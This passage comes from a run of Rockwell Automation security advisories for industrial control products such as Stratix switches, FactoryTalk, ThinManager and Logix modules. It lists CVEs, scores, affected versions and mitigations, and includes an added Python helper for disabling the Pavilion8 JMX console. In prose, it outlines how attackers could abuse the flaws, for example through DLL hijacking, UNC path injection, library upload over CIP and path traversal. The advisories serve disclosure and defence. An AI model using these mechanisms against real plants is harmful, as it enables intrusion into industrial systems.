Since publication of the original disclosure, the exploit code has become publicly available. Availability of exploit code reduces the technical barriers for threat actors to target the affected devices. Rockwell Automation has no evidence of active exploitation against the Stratix® product line currently. This advisory has been updated to include specific steps to take to create access control measures utilizing the Web UI. Rockwell Automation strongly encourages customers to follow the mitigation guidelines.

REVISION 2.0 UPDATE

Rockwell Automation has released a software update that remediates the vulnerabilities in the affected products. We strongly recommend customers update to the corrected firmware revision as soon as possible.

AFFECTED PRODUCTS AND SOLUTION

Affected Product First Known in Firmware Revision Corrected in Firmware Revision
Stratix® 5200, 5800 All versions running Cisco IOS XE Software with the Web UI feature enabled 17.12.02

VULNERABILITY DETAILS

CVE-2023-20198 IMPACT

Rockwell Automation is aware of active exploitation of a previously unknown vulnerability in the Web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated threat actor to create an account on a vulnerable system with privilege level 15 access. The threat actor could then potentially use that account to gain control of the affected system.

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 10/10 (high)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Known Exploited Vulnerability (KEV) database: Yes

CVE-2023-20273 IMPACT

Rockwell Automation is aware of active exploitation of a previously unknown vulnerability in the Web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability could allow an authenticated, remote threat actor to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. A threat actor could exploit this vulnerability by sending crafted input to the Web UI. A successful exploit could allow the threat actor to inject commands to the underlying operating system with root privileges.

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 7.2/10 (high)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Known Exploited Vulnerability (KEV) database: Yes

Mitigations and Workarounds

Rockwell strongly encourages customers to follow guidance on disabling Stratix® HTTP servers on all internet-facing systems.

  • To disable the HTTP Server feature, use the no ip http server or no ip http secure-server command in global configuration mode. If both the HTTP server and HTTPS server are in use, both commands are required to disable the HTTP Server feature.
  • Cisco Talos has provided Indicators of Compromise and Snort rules that can be found here.

REVISION 1.1 UPDATE

  • Access Control Lists should be enabled to allow only specific IP addresses to access the Web UI of the device. Detailed instructions on how to create the Access Control List are in QA67053.
  • When implementing access controls for these services, be sure to review the controls because there is the potential for an interruption in production services.

ADDITIONAL RESOURCES

  • CVE-2023-20198 JSON
  • CVE-2023-20273 JSON
  • Cisco CSAF File
High
PN1652 | FactoryTalk® Linx Vulnerable to Denial-of-Service and Information Disclosure
Published Date:
October 17, 2023
Last Updated:
October 17, 2023
CVE IDs:
CVE-2023-29464
Products:
FactoryTalk® Linx
CVSS Scores:
8.2
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number: 1.0

Version 1.0 – October 12, 2023

Affected Products

Affected Product First Known in Revision Corrected in Revision
FactoryTalk® Linx v6.20 v6.20 & v6.30 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. Rockwell Automation would like to thank Yuval Gordon, CPS Research, Microsoft Threat Intelligence Community for reporting this vulnerability to us.

CVE-2023-29464 IMPACT

FactoryTalk Linx, in the Rockwell Automation PanelView™ Plus, allows an unauthenticated threat actor to read data from memory via crafted malicious packets. Sending a size larger than the buffer size results in leakage of data from memory resulting in an information disclosure. If the size is large enough, it causes communications over the common industrial protocol to become unresponsive to any type of packet, resulting in a denial-of-service to FactoryTalk® Linx over the common industrial protocol.

CVSS Base Score: 8.2/10 (high)
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
CWE: CWE-20: Improper Input Validation

Risk Mitigation & User Action

Customers using the affected versions are encouraged to upgrade to corrected firmware revisions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

  • Install the security patches for the respective versions, referencing BF29637 - Patch: Hardening of the FactoryTalk Linx communications service for MobileView to authenticate and block improperly sized files, FactoryTalk Linx 6.20, 6.30.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • JSON CVE-2023-29464
Critical
PN1649 | Select Logix Communication Modules Vulnerable to Email Object Buffer Overflow
Published Date:
October 09, 2023
Last Updated:
October 09, 2023
CVE IDs:
CVE-2023-2262
Products:
ControlLogix Communication - Ethernet/IP
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number: 1.0

Version 1.0 – September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments. This vulnerability is not related to PN1633 - Remote Code Execution and Denial-of-Service Vulnerabilities in Select Communication Modules.

Affected Products

Affected Catalog | Series | Affected Firmware Version | Corrected in Firmware Version
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | A, B, C | <=5.008 and 5.028 | Update to 5.009 and 5.029 or later
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | D | <=11.002 | Update to >=11.003 or later
1756-EN2TP, 1756-EN2TPK, 1756-EN2TPXT | A | <=11.002 | Update to >=11.003 or later
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | A, B | <=5.008 and 5.028 | Update to 5.009 and 5.029 or later
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | C | <=11.002 | Update to >=11.003 or later
1756-EN2F, 1756-EN2FK | A, B | <=5.008 and 5.028 | Update to 5.009 and 5.029 or later
1756-EN2F, 1756-EN2FK | C | <=11.002 | Update to >=11.003 or later
1756-EN3TR, 1756-EN3TRK | A | <=5.008 and 5.028 | Update to 5.009 and 5.029 or later
1756-EN3TR, 1756-EN3TRK | B | <=11.002 | Update to >=11.003 or later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2262 IMPACT
A buffer overflow vulnerability exists in select communication devices. If exploited, a threat actor could potentially leverage this vulnerability to perform remote code execution. To exploit this vulnerability, a threat actor would have to send a maliciously crafted CIP request to the device.

CVSS Base Score: 9.8/10
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-121: Stack-based Buffer Overflow

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Restrict traffic to the SMTP port (25), if not needed.
  • Customers using the EN2/EN3 versions 10.x and higher can disable the email object, if not needed. Instructions can be found in the EtherNet/IP Network Devices User Manual (rockwellautomation.com), publication ENET-UM006.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2262 JSON
  • CISA ICS-SA CSAF
Critical
PN1648 | PN1648 | Connected Components Workbench™ Vulnerable to CefSharp Vulnerabilities
Published Date:
October 05, 2023
Last Updated:
October 05, 2023
CVE IDs:
CVE-2020-16017, CVE-2022-0609, CVE-2020-16009, CVE-2020-16013, CVE-2020-15999
Products:
Connected Components Workbench (CCW)
CVSS Scores:
9.6, 8.8, 8.8, 8.8, 6.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number | Revision History
1.0 | Version 1.0 – September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

Affected Products

Affected Product | Affected Versions | Corrected in Software Version
Connected Components Workbench™ (CCW) | Versions prior to R21 | R21 and later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2020-16017 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains a use after free vulnerability in Google Chrome versions before 86.0.4240.198. If exploited, a remote threat actor could potentially perform a sandbox escape via a crafted HTML page.

CVSS Base Score: 9.6/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CWE: 416 – Use After Free

Known Exploited Vulnerability (KEV) database:  Yes

CVE-2022-0609 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains a use after free vulnerability in Animation within Google Chrome before 98.0.4758.102. This vulnerability could potentially allow a remote threat actor to exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 416 – Use After Free

Known Exploited Vulnerability (KEV) database:  Yes

CVE-2020-16009 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains an inappropriate implementation in V8 of Google Chrome before 86.0.4240.18. This vulnerability allows a remote threat actor to potentially exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 – Out-of-bounds Write & 843 – Access of Resource Using Incompatible Type ('Type Confusion')
 
Known Exploited Vulnerability (KEV) database:  Yes

CVE-2020-16013 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains an inappropriate implementation in V8 of Google Chrome before 86.0.4240.198. This vulnerability allows a remote threat actor to potentially exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database:  Yes

CVE-2020-15999 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains a heap buffer overflow vulnerability in FreeType within Google Chrome before 86.0.4240.111. This vulnerability could allow a remote threat actor to potentially exploit heap corruption via a crafted HTML page.

CVSS Base Score: 6.5/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database:  Yes

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Upgrade to version 21 or later.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2020-16017 JSON
  • CVE-2022-0609 JSON
  • CVE-2020-16009 JSON
  • CVE-2020-16013 JSON
  • CVE-2020-15999 JSON
  • CISA ICS-SA CSAF
Critical
PN1647 | PN1647 | PanelView™ 800 Vulnerable to CVE-2017-12652
Published Date:
October 05, 2023
Last Updated:
October 05, 2023
CVE IDs:
CVE-2017-12652
Products:
PanelView 800, PanelView Component Refresh (PanelView 800)
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number | Revision History
1.0 | Version 1.0 – September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
2711R-T10T, 2711R-T7T, 2711R-T4T | v3.011 | v6.011

Vulnerability Details

An input/output validation vulnerability exists in a third-party component that the PanelView™ 800 utilizes. Libpng, which is PNG’s reference library, version 1.6.32 and earlier does not properly check the length of chunks against the user limit. Libpng versions prior to 1.6.32 are susceptible to a vulnerability which, when successfully exploited, could potentially lead to a disclosure of sensitive information, addition or modification of data, or a denial-of-service condition.
Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 9.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: 20 – Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.
 

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Update to v6.011 or later that mitigates the issue.
  • Implement QA43240 - Recommended Security Guidelines from Rockwell Automation.

Additional Resources

  • JSON CVE-2017-12652
Medium
PN1646 | PN1646 | KEPServer Enterprise Vulnerable to Multiple Vulnerabilities
Published Date:
October 05, 2023
Last Updated:
September 26, 2025
CVE IDs:
CVE-2023-29444, CVE-2023-29445, CVE-2023-29446, CVE-2023-29447
Products:
KEPServer Enterprise
CVSS Scores:
6.3, 6.3, 4.7, 5.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Version 1.0 – September 12, 2023

Version 1.1 - September 26, 2025 - Corrected versions and CVE update

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
KEPServer Enterprise | v11.00 | Update to version 14

Vulnerability Details

Rockwell Automation was notified by CISA of vulnerabilities discovered in Kepware® KEPServerEX (also known as PTC ThingWorx Industrial Connectivity), which affects Rockwell Automation’s KEPServer Enterprise product. Successful exploitation of these vulnerabilities could allow a threat actor to gain elevated privileges, execute arbitrary code, and obtain server hashes and credentials.

CVE-2023-29444 KEPServer Enterprise Uncontrolled Search Path Element
The installer application of KEPServerEX is vulnerable to DLL search order hijacking. This could allow an adversary to repackage the installer with a harmful DLL and trick users into installing the trojanized software. Successful exploitation could lead to code execution with administrator privileges. No known public exploits specifically target this security issue. Creating a working exploit for this security issue would be difficult because the code would need to be placed in a specific directory in the file system.

CVSS Base Score: 6.3 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
CWE-427: Uncontrolled Search Path Element

CVE-2023-29445 KEPServer Enterprise Uncontrolled Search Path Element
The KEPServerEX binary is vulnerable to DLL search order hijacking. A locally authenticated adversary could escalate privileges to administrator by planting a malicious DLL in a specific directory. No known public exploits specifically target this security issue. Creating a working exploit for this security issue would be difficult.

CVSS Base Score: 6.3 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
CWE-427: Uncontrolled Search Path Element

CVE-2023-29446 KEPServer Enterprise Improper Input Validation
KEPServerEX is vulnerable to UNC path injection via a malicious project file. By tricking a user into loading a project file and clicking a specific button in the GUI, an adversary could obtain Windows user NTLMv2 hashes and crack them offline. No known public exploits specifically target this security issue.

CVSS Base Score: 4.7 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE-20: Improper Input Validation

CVE-2023-29447 KEPServer Enterprise Insufficiently Protected Credentials
The KEPServerEX Configuration web server uses basic authentication to protect user credentials. An adversary could perform a man-in-the-middle (MitM) attack via ARP spoofing to obtain the web server's plaintext credentials. No known public exploits specifically target this security issue.

CVSS Base Score: 5.7 /10 (Medium)
CVSS 3.1 Vector String: AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE-522: Insufficiently Protected Credentials

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected versions are encouraged to apply the risk mitigations below and implement our suggested security best practices to minimize risk of this vulnerability in their environments. 

  • Users should follow the directions in PTC’s secure configuration documentation.
  • Implement QA43240 - Recommended Security Guidelines from Rockwell Automation.

Additional Resources

  • ICSA-23-243-03 Advisory
  • PTC Advisory CS399528
Critical
PN1645 | PN1645 | FactoryTalk View Machine Edition Vulnerable to Remote Code Execution
Published Date:
October 05, 2023
Last Updated:
October 05, 2023
CVE IDs:
CVE-2023-2071
Products:
FactoryTalk View Machine Edition
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number | Revision History
1.0 | Version 1.0 – September 12, 2023

Affected Products

Affected Product | First Known in Revision | Corrected in Revision
FactoryTalk View Machine Edition | v12.0 | v12.0 & v13.0 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. Rockwell Automation would like to thank Yuval Gordon, CPS Research, and the Microsoft Threat Intelligence Community for reporting this vulnerability to us.

CVE-2023-2071 IMPACT

FactoryTalk View Machine Edition on the PanelView Plus improperly verifies user input, which allows an unauthenticated attacker to achieve remote code execution via crafted malicious packets. The device has the functionality, through a CIP class, to execute exported functions from libraries. A routine restricts this to specific functions from two dynamic link library files. By using a CIP class, an attacker can upload a self-made library to the device, which allows the attacker to bypass the security check and execute any code written in the function.

CVSS Base Score: 9.8/10 (high)
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: 20 – Improper Input Validation

Risk Mitigation & User Action

Customers using the affected versions are encouraged to upgrade to corrected firmware revisions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

  • Install the security patches for the respective versions referencing BF29493 - Patch: FactoryTalk Linx CIP Vulnerability issue, FactoryTalk View ME 12.0, 13.0.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • JSON CVE-2023-2071
  • CISA ICS-SA CSAF
High
PN1642 | PN1642 | Pavilion8® Security Misconfiguration Vulnerability
Published Date:
October 05, 2023
Last Updated:
October 05, 2023
CVE IDs:
CVE-2023-29463
Products:
ControlLogix Communications - Ethernet/IP
CVSS Scores:
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number | Revision History
1.0 | Version 1.0 – September 12, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
Pavilion8® | v5.17 | v5.20

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-29463 IMPACT

The JMX Console within Pavilion8® is exposed to application users and does not require authentication. If exploited, a malicious user could potentially retrieve other application users' session data and/or log users out of their sessions.

CVSS Base Score: 8.8/10
CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: 287 – Improper Authentication

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Update to v5.20
  • QA43240 - Recommended Security Guidelines from Rockwell Automation


If customers are unable to update to v5.20, please follow the instructions below to disable the vulnerability in v5.17.

  1. Open the web.xml file located under Console\container\webapps\ROOT\WEB-INF in the Pavilion8® installation folder chosen during installation; by default this is C:\Pavilion\Console\container\webapps\ROOT\WEB-INF.
  2. Search for the text jmx-console-action-handler and delete the below lines from web.xml file:

      <servlet>
        <servlet-name>jmx-console-action-handler</servlet-name>
        <servlet-class>com.pav.jboss.jmx.HtmlAdaptorServlet</servlet-class>
      </servlet>
      <servlet-mapping>
        <servlet-name>jmx-console-action-handler</servlet-name>
        <url-pattern>/jmx-console/HtmlAdaptor</url-pattern>
      </servlet-mapping>
     
  3. Save the changes and close the file.
  4. Restart Pavilion8® Console Service.
  5. Log out, log back into the console, and navigate to the URL http://<FQDN>/jmx-console to confirm that you receive the error message HTTP Status 404 – Not Found.

Note: <FQDN> is your fully qualified domain name used for the Console login.
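Steps 1 to 5 above, as an added example that is not Pavilion8 or Rockwell Automation code: a Python helper that removes the jmx-console-action-handler <servlet> and <servlet-mapping> elements from a web.xml (here a constructed excerpt, since only the two affected elements are quoted above) and then checks that the console URL answers 404 as step 5 expects. The sample web.xml namespace, the other-servlet entry, and the function names are assumptions.

```python
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

SERVLET_NAME = "jmx-console-action-handler"   # name quoted in the advisory
REMOVABLE = ("servlet", "servlet-mapping")

# Constructed web.xml excerpt: the two elements the advisory says to delete,
# plus an unrelated servlet that must survive the edit. Namespace is assumed.
SAMPLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <servlet>
    <servlet-name>other-servlet</servlet-name>
    <servlet-class>com.example.OtherServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>jmx-console-action-handler</servlet-name>
    <servlet-class>com.pav.jboss.jmx.HtmlAdaptorServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>other-servlet</servlet-name>
    <url-pattern>/other</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>jmx-console-action-handler</servlet-name>
    <url-pattern>/jmx-console/HtmlAdaptor</url-pattern>
  </servlet-mapping>
</web-app>
"""


def _local(tag):
    """Strip an XML namespace: '{uri}servlet' -> 'servlet'."""
    return tag.rsplit("}", 1)[-1]


def _names_jmx_handler(elem):
    """True if elem has a <servlet-name> child naming the JMX console handler."""
    return any(
        _local(child.tag) == "servlet-name"
        and (child.text or "").strip() == SERVLET_NAME
        for child in elem
    )


def jmx_handler_present(web_xml_text):
    """Step 2 precondition / post-check: does web.xml still wire up the handler?"""
    root = ET.fromstring(web_xml_text)
    return any(_local(e.tag) in REMOVABLE and _names_jmx_handler(e) for e in root.iter())


def remove_jmx_console_handler(web_xml_text):
    """Apply step 2: drop every <servlet> and <servlet-mapping> whose
    servlet-name is jmx-console-action-handler. Returns (new_text, removed)."""
    root = ET.fromstring(web_xml_text)
    if root.tag.startswith("{"):
        # Keep the default namespace unprefixed instead of ns0: on output.
        ET.register_namespace("", root.tag[1:].split("}", 1)[0])
    removed = 0
    for parent in list(root.iter()):           # snapshot: we mutate children
        for child in list(parent):
            if _local(child.tag) in REMOVABLE and _names_jmx_handler(child):
                parent.remove(child)
                removed += 1
    # ElementTree drops XML comments and the prolog; review the diff before
    # replacing the file on a production console.
    return ET.tostring(root, encoding="unicode"), removed


def harden_web_xml(path):
    """Steps 1-3 against a file on disk; returns how many elements were removed."""
    with open(path, encoding="utf-8") as fh:
        original = fh.read()
    patched, removed = remove_jmx_console_handler(original)
    if removed:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(patched)
    return removed


def jmx_console_returns_404(base_url, timeout=5):
    """Step 5: after the service restart, http://<FQDN>/jmx-console must answer
    HTTP 404. Returns True only for a 404; any other response or error is a
    failed check."""
    try:
        urllib.request.urlopen(base_url.rstrip("/") + "/jmx-console", timeout=timeout)
    except urllib.error.HTTPError as err:
        return err.code == 404
    except urllib.error.URLError:
        return False
    return False


if __name__ == "__main__":
    patched, removed = remove_jmx_console_handler(SAMPLE_WEB_XML)
    print("removed %d element(s); handler still present: %s"
          % (removed, jmx_handler_present(patched)))
```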

Additional Resources

  • CVE-2023-29463 JSON
High
PN1639 | PN1639 | Select Distributed I/O Communication Modules vulnerable to a Denial-of-Service Vulnerability
Published Date:
August 23, 2023
Last Updated:
August 23, 2023
CVE IDs:
CVE-2022-1737
Products:
1732E-OB16M12DR Series B, 1732E-IB16M12R Series B, 1734-AENTR , 1732E-OB16M12R Series B, 1732E-IB16M12DR Series B, 1732E-8X8M12DR Series B, 1738-AENTR Series A , 1732E-12X4M12P5QCDR Series A, 1732E-12X4M12QCDR Series A, 1732E-16CFGM12QCR Series A, 1734-AENT, 1732E-12X4M12QCDR Series A, 1732E-16CFGM12P5QCR Series A, 1732E-16CFGM12R Series B, 1799ER-IQ10XOQ10 Series B, 1732E-16CFGM12P5QCWR Series B, 1732E-16CFGM12QCWR Series A
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number | Revision History
1.0 | Version 1.0 – August 23, 2023

Affected Products

Affected Product | First Known in Firmware Version | Corrected in Firmware Version
1734-AENT/1734-AENTR Series C | <=7.011 | 7.013
1734-AENT/1734-AENTR Series B | <=5.019 | 5.021
1738-AENT/1738-AENTR Series B | <=6.011 | 6.013
1794-AENTR Series A | <=2.011 | 2.012
1732E-16CFGM12QCWR Series A | <=3.011 | 3.012
1732E-12X4M12QCDR Series A | <=3.011 | 3.012
1732E-16CFGM12QCR Series A | <=3.011 | 3.012
1732E-16CFGM12P5QCR Series A | <=3.011 | 3.012
1732E-12X4M12P5QCDR Series A | <=3.011 | 3.012
1732E-16CFGM12P5QCWR Series B | <=3.011 | 3.012
1732E-IB16M12R Series B | <=3.011 | 3.012
1732E-OB16M12R Series B | <=3.011 | 3.012
1732E-16CFGM12R Series B | <=3.011 | 3.012
1732E-IB16M12DR Series B | <=3.011 | 3.012
1732E-OB16M12DR Series B | <=3.011 | 3.012
1732E-8X8M12DR Series B | <=3.011 | 3.012
1799ER-IQ10XOQ10 Series B | <=3.011 | 3.012

Vulnerability Details

This issue was reported to Rockwell Automation by the Cybersecurity and Infrastructure Security Agency. The affected devices utilize the Pyramid Solutions EtherNet/IP Adapter kit and could potentially be affected by the vulnerability.

CVE-2022-1737 IMPACT
Pyramid Solutions' affected products, the Developer and DLL kits for EtherNet/IP Adapter and EtherNet/IP Scanner may be vulnerable to an out-of-bounds write, which may allow an unauthorized threat actor to send a specially crafted packet that may result in a denial-of-service condition.

CVSS Base Score: 8.6
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
CWE: CWE-787 Out-of-Bounds Write


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations below, if possible. Additionally, we encourage our customers to implement our suggested security best practices to minimize the risk of vulnerability.
  • Customers should upgrade to the corrected firmware to mitigate the issues.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2022-1737 JSON

Critical
PN1638 | PN1638 | ThinManager® ThinServer™ Input Validation Vulnerabilities
Published Date:
August 17, 2023
Last Updated:
August 17, 2023
CVE IDs:
CVE-2023-2917, CVE-2023-2914, CVE-2023-2915
Products:
ThinManager ThinServer Input Validation Vulnerabilities
CVSS Scores:
7.5, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number | Revision History
1.0 | Version 1.0 – August 17, 2023

Affected Products

Affected Product: ThinManager® ThinServer™
Vulnerabilities: CVE-2023-2914, CVE-2023-2915, CVE-2023-2917

First Known in Software Versions | Corrected in Software Versions
11.0.0-11.2.6 | 11.0.7
11.1.0-11.1.6 | 11.1.7
11.2.0-11.2.6 | 11.2.8
12.0.0-12.0.5 | 12.0.6
12.1.0-12.1.6 | 12.1.7
13.0.0-13.0.2 | 13.0.3
13.1.0 | 13.1.1

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. This vulnerability was discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2023-2914 IMPACT
Due to improper input validation, an integer overflow condition exists in the affected products. When the ThinManager processes incoming messages, a read access violation occurs and terminates the process. A malicious user could exploit this vulnerability by sending a crafted synchronization protocol message.

CVSS Base Score: 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: 20 Improper Input Validation


CVE-2023-2915 IMPACT
Due to improper input validation, a path traversal vulnerability exists when the ThinManager processes a certain function. If exploited, an unauthenticated remote threat actor can delete arbitrary files with system privileges.   A malicious user could exploit this vulnerability by sending a specifically crafted synchronization protocol message.

CVSS Base Score: 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: 20 Improper Input Validation


CVE-2023-2917 IMPACT
Due to improper input validation, a path traversal vulnerability exists, via the file name field, when the ThinManager processes a certain function. If exploited, an unauthenticated remote attacker can upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed.  A malicious user could exploit this vulnerability by sending a crafted synchronization protocol message.

CVSS Base Score: 9.8/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: 20 Improper Input Validation


Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.
  • Update to the corrected software versions.
  • Limit remote access for TCP Port 2031 to known thin clients and ThinManager servers.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2914 JSON
  • CVE-2023-2915 JSON
  • CVE-2023-2917 JSON

High
PN1637 | PN1637 | Armor™ PowerFlex® Critical Fault Vulnerability
Published Date:
August 08, 2023
Last Updated:
August 08, 2023
CVE IDs:
CVE-2023-2423
Products:
Armor PowerFlex Critical Fault
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number | Revision History
1.0 | Version 1.0 – August 8, 2023

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
Armor™ PowerFlex® | 1.003 | 2.001 or later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2423 IMPACT
A vulnerability was discovered in Armor™ PowerFlex® when the product sends communications to the local event log. Threat actors could exploit this vulnerability by sending an influx of network commands, causing the product to generate an influx of event log traffic at a high rate. If exploited, the product would stop normal operations and self-reset. The error code would need to be cleared prior to resuming normal operations.

CVSS Base Score: 8.6
CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-682 Incorrect Calculation


